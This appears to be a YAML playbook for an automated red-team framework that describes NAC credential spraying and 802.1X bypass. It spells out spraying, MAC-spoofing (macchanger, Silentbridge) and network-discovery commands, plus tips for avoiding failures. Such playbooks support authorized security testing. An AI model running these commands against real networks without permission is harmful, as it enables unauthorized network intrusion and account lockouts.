id: nac_credential_testing
name: NAC Credential Testing and Bypass
description: |
  Test credentials against NAC-protected network segments.
  Automatically batches multiple credential attempts for efficiency.
  This is the killer feature - realistic batched attack progression!
category: exploitation
risk_level: high
batch_compatible: true

triggers:
  - id: trigger_nac_with_credentials
    type: asset_combination
    required_count: 2
    priority: 2
    description: Triggers when NAC-enabled network has available credentials
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["network_id", "credential_hash"]
      cooldown_seconds: 3600

  # Alternative trigger for property matching
  - id: trigger_nac_network_properties
    type: property_match
    asset_type: network_segment
    required_properties:
      nac_enabled: true
      access_level: blocked
    required_count: 1
    priority: 2
    description: Triggers when NAC is detected on a network segment
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["network_id"]

steps:
  - id: nac_credential_spray
    name: NAC Credential Spray
    description: Test credentials against NAC authentication server
    order: 1
    timeout_seconds: 1800
    commands:
      - tool: nac_bypass_tool
        platforms: [linux, macos]
        command: "nac_bypass_tool --network {network_id} --credentials-file {credentials_file} --batch --threads 4"
        preferred: true
        notes: "Purpose-built tool for NAC credential testing with batching support"
        requires_elevation: true
      - tool: wpa_supplicant
        platforms: [linux]
        command: "wpa_supplicant -i {interface} -c /tmp/wpa_creds_{network_id}.conf"
        preferred: false
        notes: "Standard Linux 802.1X authentication, requires config file generation"
        requires_elevation: true
      - tool: eapol_test
        platforms: [linux, macos]
        command: "eapol_test -c /tmp/eap_creds.conf -a {auth_server} -s {shared_secret}"
        preferred: false
        notes: "Test EAP authentication without network connection"
        requires_elevation: false

  - id: dot1x_bypass_attempt
    name: 802.1X Bypass Attempt
    description: Attempt various 802.1X bypass techniques including MAC spoofing
    order: 2
    timeout_seconds: 300
    commands:
      - tool: dot1x_bypass
        platforms: [linux]
        command: "dot1x_bypass --interface eth0 --mac-spoof {authorized_mac} --username {username} --password {password}"
        preferred: true
        notes: "Specialized 802.1X bypass tool with MAC spoofing"
        requires_elevation: true
      - tool: macchanger
        platforms: [linux]
        command: "macchanger -m {authorized_mac} {interface} && wpa_supplicant -i {interface} -c /tmp/wpa_creds.conf"
        preferred: false
        notes: "Manual MAC spoofing + authentication, two-step process"
        requires_elevation: true
      - tool: Silentbridge
        platforms: [linux]
        command: "silentbridge -i {interface} -c /tmp/wpa_creds.conf -m {authorized_mac}"
        preferred: false
        notes: "Transparent 802.1X bridge, useful for device pivoting"
        requires_elevation: true

  - id: network_access_validation
    name: Validate Network Access
    description: Confirm successful bypass and document access level
    order: 3
    timeout_seconds: 60
    commands:
      - tool: ping
        platforms: [linux, macos, windows]
        command: "ping -c 3 {gateway} && traceroute -m 5 {target_network}"
        preferred: true
        notes: "Basic connectivity and routing validation"
        requires_elevation: false
      - tool: PowerShell
        platforms: [windows]
        command: "Test-Connection -ComputerName {gateway} -Count 3; Test-NetConnection {target_network}"
        preferred: true
        notes: "Native Windows network testing cmdlets"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sn {target_network}/24 --max-retries 1 -T4"
        preferred: false
        notes: "Comprehensive network discovery to validate access scope"
        requires_elevation: false

metadata:
  tools:
    - nac_bypass_tool
    - dot1x_bypass
    - ping
    - traceroute
  risk_warning: "High risk - May trigger IDS/IPS and security monitoring. Account lockout possible with multiple failed attempts."
  batch_strategy: |
    When multiple credentials are available, this methodology automatically
    batches them into a single efficient credential spray operation rather
    than executing individually. This is realistic attacker behavior.
  expected_outcomes:
    - network_access_granted
    - nac_bypass_successful
    - access_level_upgraded
  common_issues:
    - issue: "Credentials fail but no lockout occurs"
      solution: "Verify credential format matches NAC requirements (domain\\user vs user@domain). Check if accounts are expired or disabled."
    - issue: "802.1X bypass attempts immediately fail"
      solution: "Ensure network interface supports 802.1X. Verify authorized MAC addresses are correct. Try MAC randomization if strict binding is in place."
    - issue: "Network access validation shows partial connectivity"
      solution: "NAC may have granted limited VLAN access. Check routing tables and firewall rules. Document the access level achieved."
  troubleshooting:
    "Tool not found": "Install nac_bypass_tool from the tools repository. Ensure PATH is configured correctly."
    "Permission denied on network interface": "Run with elevated privileges (sudo). Check interface is not already in use by NetworkManager."
    "Timeout during credential spray": "Reduce thread count to avoid overwhelming the authentication server. Increase timeout value if network latency is high."
    "No response from authentication server": "Verify network connectivity to auth server. Check if MAC filtering is blocking unauthenticated traffic. May need physical access to authorized port."
